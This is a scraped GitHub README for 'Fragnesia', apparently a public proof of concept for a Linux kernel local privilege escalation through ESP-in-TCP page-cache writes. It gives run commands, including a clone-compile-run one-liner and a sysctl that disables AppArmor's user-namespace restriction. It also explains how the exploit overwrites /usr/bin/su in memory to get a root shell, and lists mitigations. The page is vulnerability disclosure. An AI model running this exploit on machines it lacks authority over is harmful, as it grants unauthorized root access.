pocs/fragnesia at main · v12-security/pocs · GitHub

//files/disambiguate" data-turbo-transient="true" />

Skip to content

Search or jump to...

Search code, repositories, users, issues, pull requests...

-->

Search

Clear

Search syntax tips

Provide feedback

--><br>We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

-->

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

//files/disambiguate;ref_cta:Sign up;ref_loc:header logged out"}"<br>Sign up

Appearance settings

Resetting focus

You signed in with another tab or window. Reload to refresh your session.<br>You signed out in another tab or window. Reload to refresh your session.<br>You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

{{ message }}

v12-security

pocs

Public

Notifications<br>You must be signed in to change notification settings

Fork<br>67

Star<br>343

FilesExpand file tree

main

/fragnesia<br>Copy path

Directory actions

More options<br>More options

Directory actions

More options<br>More options

Latest commit

History<br>History<br>History

main

/fragnesia

Top

Folders and files<br>NameNameLast commit message<br>Last commit date<br>parent directory<br>..<br>README.md

README.md

fragnesia.c

fragnesia.c

View all files

README.md<br>Outline<br>Fragnesia

Abstract

vuln.mp4

Fragnesia is a universal Linux local privilege escalation exploit, discovered with V12 by William Bowling with the V12 team. Fragnesia is a member of the Dirty Frag vulnerability class. This is a separate bug in the ESP/XFRM from dirtyfrag which has received its own patch. However, it is in the same surface and the mitigation is the same as for dirtyfrag.

It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition.

The technique extends the page-cache write bug class that includes Dirty Pipe: when a TCP socket transitions to espintcp ULP mode after data has already been spliced from a file into the receive queue, the kernel processes the queued file pages as ESP ciphertext. The AES-GCM keystream byte at counter block position 2, byte 0 is XORed directly into the cached file page. By selecting the IV nonce to produce a desired keystream byte, any target byte in the file can be set to any value — one byte per trigger invocation.

The exploit builds a 256-entry lookup table mapping each possible keystream byte to its corresponding nonce, then iterates over a payload, firing the splice/ULP race for each byte that needs changing. It writes a small position-independent ELF stub (setresuid/setresgid/execve /bin/sh) over the first 192 bytes of /usr/bin/su in the page cache, then calls execve("/usr/bin/su") to obtain a root shell. The page cache modification is not backed to disk; the on-disk binary is untouched.

"Fragnesia"?

Yes, because the core bug is: the skb “forgets” that a frag is shared during coalescing.

Exploitation

One-line special:

git clone https://github.com/v12-security/pocs.git && cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

Ubuntu note: AppArmor restricts unprivileged user namespaces by default. You must first run:

sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

You can chain other bugs to bypass this requirement but this is out of scope for this vulnerability.

The exploit targets /usr/bin/su directly. On success it drops into a root shell.

Critical Cleanup Warning

After the exploit runs, /usr/bin/su in the page cache contains the injected stub. Any subsequent execution of su will re-spawn a shell until the page is evicted. Drop the cache or reboot before leaving the machine:

echo 1 | tee /proc/sys/vm/drop_caches

Mitigation

Same as dirtyfrag.

/etc/modprobe.d/dirtyfrag.conf">rmmod esp4 esp6 rxrpc<br>printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf

Affected Versions

All versions affected by dirtyfrag are affected.

Any versions without this patch: https://lists.openwall.net/netdev/2026/05/13/79, so Linux kernels before May 13 2026.

Confirmed working on Linux localhost 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux (vps purchased from Linode)

How It Works

User + network namespace setup. The exploit calls unshare(CLONE_NEWUSER | CLONE_NEWNET) to obtain a namespace where it holds CAP_NET_ADMIN without any real privileges on the host.

XFRM SA installation. Inside the network namespace, a transport-mode ESP-in-TCP security association is installed via NETLINK_XFRM using AES-128-GCM with a known key and SPI 0x100.

Keystream table. The 16-byte AES-GCM counter block for sequence position 2 is [salt || IV || 00000002]. Encrypting it under the known key yields a...